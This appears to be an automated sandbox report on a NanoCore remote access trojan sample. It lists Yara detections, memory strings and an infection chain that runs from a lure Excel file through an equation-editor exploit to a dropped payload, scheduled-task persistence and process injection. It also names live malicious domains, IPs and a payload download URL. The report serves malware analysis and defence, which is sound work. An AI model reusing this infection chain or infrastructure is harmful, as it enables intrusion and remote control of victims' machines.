Source: Yara match File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Detected Nanocore Rat
Source: vbc.exe, 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000007.00000002.2393755361.00000000005C0000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Yara detected Nanocore RAT
Source: Yara match File source: 00000007.00000002.2394028902.0000000000840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2197311253.00000000036A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2395217863.00000000037E6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393666781.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2480, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2696, type: MEMORY
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.3890588.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.38085f6.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.844629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.3811a55.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.840000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.RegSvcs.exe.380d42c.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.37494e8.4.raw.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F256E bind, 7_2_004F256E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe Code function: 7_2_004F253B bind, 7_2_004F253B
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 385193 Sample: SOL2021-03-14-NETC-NI-21-04... Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 Malicious sample detected (through community Yara rule) 2->59 61 17 other signatures 2->61 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 174 55 2->12         started        14 smtpsvc.exe 2 2->14         started        process3 dnsIp4 45 covid19vaccinations.hopto.org 13.235.115.155, 49167, 80 AMAZON-02US United States 7->45 35 C:\Users\user\AppData\Local\...\nano[1].exe, PE32 7->35 dropped 37 C:\Users\Public\vbc.exe, PE32 7->37 dropped 65 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->65 16 vbc.exe 5 7->16         started        39 ~$SOL2021-03-14-NE...1-049-CEVA INV.xlsx, data 12->39 dropped file5 signatures6 process7 file8 27 C:\Users\user\AppData\Roaming\gmSlQSien.exe, PE32 16->27 dropped 29 C:\Users\user\AppData\Local\...\tmp2720.tmp, XML 16->29 dropped 47 Machine Learning detection for dropped file 16->47 49 Uses schtasks.exe or at.exe to add and modify task schedules 16->49 51 Writes to foreign memory regions 16->51 53 2 other signatures 16->53 20 RegSvcs.exe 1 8 16->20         started        25 schtasks.exe 16->25         started        signatures9 process10 dnsIp11 41 79.134.225.30, 1144 FINK-TELECOM-SERVICESCH Switzerland 20->41 43 nassiru1155.ddns.net 20->43 31 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 20->31 dropped 33 C:\Program Files (x86)\...\smtpsvc.exe, PE32 20->33 dropped 63 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->63 file12 signatures13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
13.235.115.155
 covid19vaccinations.hopto.org United States
16509 AMAZON-02US true
79.134.225.30
 unknown Switzerland
6775 FINK-TELECOM-SERVICESCH true

Contacted Domains

Name IP Active
covid19vaccinations.hopto.org 13.235.115.155 true
nassiru1155.ddns.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
nassiru1155.ddns.net true
  • Avira URL Cloud: safe
 unknown
http://covid19vaccinations.hopto.org/nano.exe true
  • 13%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
79.134.225.30 true
  • Avira URL Cloud: safe
 unknown